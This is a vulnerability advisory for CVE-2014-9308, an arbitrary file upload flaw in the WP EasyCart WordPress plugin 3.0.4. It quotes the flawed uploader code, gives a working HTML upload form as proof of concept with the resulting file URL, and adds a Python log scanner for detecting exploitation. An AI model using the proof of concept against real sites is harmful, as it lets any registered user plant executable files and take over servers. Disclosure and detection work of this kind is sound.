
WordPress Shopping Cart 3.0.4 - Arbitrary File Upload

Source: seebug (www.seebug.org), SSV:89276
Published: Aug 31, 2015
EPSS: 0.923 (High), percentile 99.0%

# Affected version: WordPress Shopping Cart 3.0.4
# Date: 29-10-2014
# Software link: https://wordpress.org/plugins/wp-easycart/
# CVE: CVE-2014-9308
# Category: Application

Vulnerability details:

Any registered user can upload any file.

Upload point: wp-easycart\inc\amfphp\administration\banneruploaderscript.php

$date = $_POST['datemd5'];
$usersqlquery = sprintf("SELECT  ec_user.*, ec_role.admin_access FROM  ec_user  LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE  ec_user.password = '%s' AND  (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));
$userresult = mysql_query($usersqlquery);
$users = mysql_fetch_assoc($userresult);
// Flawed check: is_user_logged_in() is true for any logged-in WordPress account,
// so the admin lookup above is bypassed by the "||".
if ($users || is_user_logged_in()) {
    $filename = $_FILES['Filedata']['name'];
    $filetmpname = $_FILES['Filedata']['tmp_name'];
    $fileType = $_FILES["Filedata"]["type"];
    $fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);
    $explodedfilename = pathinfo($filename);
    $nameoffile = $explodedfilename['filename'];
    $fileextension = $explodedfilename['extension'];
    // The client-supplied name, extension and datemd5 value go into the destination path unchecked.
    move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);
}

Verification:

Log in as a regular user (created using wp-login.php?action=register), then save the following form as an HTML file:

<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>

The uploaded file will be visible at:

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
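
For triage, the uploader script and the banners directory named in this advisory can be searched for in web server access logs. The Python sketch below is an added example, not part of the original advisory or the plugin; the "combined" access-log format, the image-extension allowlist and the sample log lines are assumptions.

```python
import re
from urllib.parse import unquote

# Endpoint and upload directory come from the advisory. The "combined" access-log
# format and the image allowlist are assumptions of this example.
UPLOADER = "/wp-easycart/inc/amfphp/administration/banneruploaderscript.php"
BANNERS = "/wp-easycart/products/banners/"
IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

def scan(lines):
    """Return (kind, client_ip, timestamp, path) tuples worth reviewing."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Drop the query string and decode %xx so encoded dots do not hide an extension.
        path = unquote(m["url"].split("?", 1)[0])
        if m["method"] == "POST" and path.endswith(UPLOADER):
            # The script's own SQL check looks for an admin account, so review every POST.
            uploaders.add(m["ip"])
            findings.append(("upload", m["ip"], m["ts"], path))
        elif BANNERS in path:
            name = path.rsplit("/", 1)[-1]
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if name and ext not in IMAGE_EXT:
                # A banner directory should only serve images.
                kind = "non-image-after-upload" if m["ip"] in uploaders else "non-image"
                findings.append((kind, m["ip"], m["ts"], path))
    return findings

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Aug/2015:10:00:01 +0000] "POST /wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [31/Aug/2015:10:00:05 +0000] "GET /wp-content/plugins/wp-easycart/products/banners/promo_1.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2015:10:01:00 +0000] "GET /wp-content/plugins/wp-easycart/products/banners/sale_1.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Matching on path suffixes rather than full URLs keeps the check working when WordPress is installed in a subdirectory.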